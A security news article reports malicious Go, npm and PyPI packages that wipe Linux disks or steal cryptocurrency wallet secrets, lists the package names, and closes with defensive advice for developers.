Cybersecurity researchers have uncovered a new wave of dangerous supply chain attacks targeting software development ecosystems. These attacks use malicious Go Packages, npm, and PyPI packages to either wipe Linux systems or steal sensitive data, including cryptocurrency wallet information.
According to Kush Pandya of Socket, three newly discovered Go modules disguise their true purpose using obfuscated code. Once executed, they fetch a destructive payload designed to overwrite a Linux system’s primary disk, rendering it permanently inoperable.
Go Modules Deliver Devastating Payloads
The three malicious Go packages uncovered are:
github[.]com/truthfulpharm/prototransformgithub[.]com/blankloggia/go-mcpgithub[.]com/steelpoor/tlsproxy
Though they appear harmless, these modules contain hidden logic that checks if the host operating system is Linux. If confirmed, the code uses wget to download a shell script from a remote server. This script then overwrites the /dev/sda disk with zeroes—an irreversible action that destroys all stored data and makes the system unbootable.
“This destructive method ensures no data recovery tool or forensic process can restore the data,” said Pandya. “It highlights the extreme risk posed by modern supply chain attacks that turn trusted code into catastrophic threats.”
These modules serve as a warning to developers and IT administrators, especially those running Linux environments. The packages were crafted to blend in with legitimate repositories, using convincing names and plausible functionality.
Widespread Threats Across npm and PyPI Ecosystems
The Go modules aren’t the only threat. Researchers from Socket, Sonatype, and Fortinet also reported a surge in malicious npm and PyPI packages. These packages are designed to steal mnemonic seed phrases and private keys from cryptocurrency wallets and developer systems.
The malicious npm packages include:
crypto-encrypt-tsreact-native-scrollpageviewtestbankingbundleservbuttonfactoryserv-paypaltommyboytestingcompliancereadserv-paypaloauth2-paypalpaymentapiplatformservice-paypaluserbridge-paypaluserrelationship-paypal
These packages masquerade as legitimate modules related to payment processing and encryption. Once installed, they secretly exfiltrate sensitive data to remote servers controlled by the attackers.
In the Python Package Index (PyPI), two specific malware-laced packages—web3x and herewalletbot—target crypto wallets and siphon mnemonic phrases. Together, they’ve been downloaded more than 6,800 times since their 2024 release.
Researchers also flagged seven more PyPI packages that use Gmail’s SMTP server and WebSockets for stealthy communication:
cfc-bsb(2,913 downloads)coffin2022(6,571 downloads)coffin-codes-2022(18,126 downloads)coffin-codes-net(6,144 downloads)coffin-codes-net2(6,238 downloads)coffin-codes-pro(9,012 downloads)coffin-grave(6,544 downloads)
These packages contain hard-coded Gmail credentials used to signal successful infection. After that, they create a WebSocket connection for two-way communication with the threat actor. This technique leverages the trust associated with Gmail domains to bypass corporate firewalls and endpoint protection tools.
Interestingly, the cfc-bsb package omits the Gmail trick but still contains WebSocket code, making it a tool for remote access.
Developer Guidelines to Stay Secure
To protect against such attacks, security experts recommend several steps:
- Always verify the history of a package’s publisher.
- Check linked GitHub repositories and cross-reference activity.
- Audit dependencies frequently, especially those pulled from public registries.
- Implement strict access controls on private keys and credentials.
- Monitor network traffic for suspicious activity, especially outbound SMTP traffic.
“Do not trust a package just because it’s been around for years,” warned Olivia Brown of Socket. “Malicious actors are getting smarter and more patient. They wait until a package gains trust before injecting malicious code.”
These incidents highlight how the software supply chain remains a soft target for cybercriminals. As tools become more automated, and attackers more sophisticated, developers must treat every third-party dependency as a potential risk.
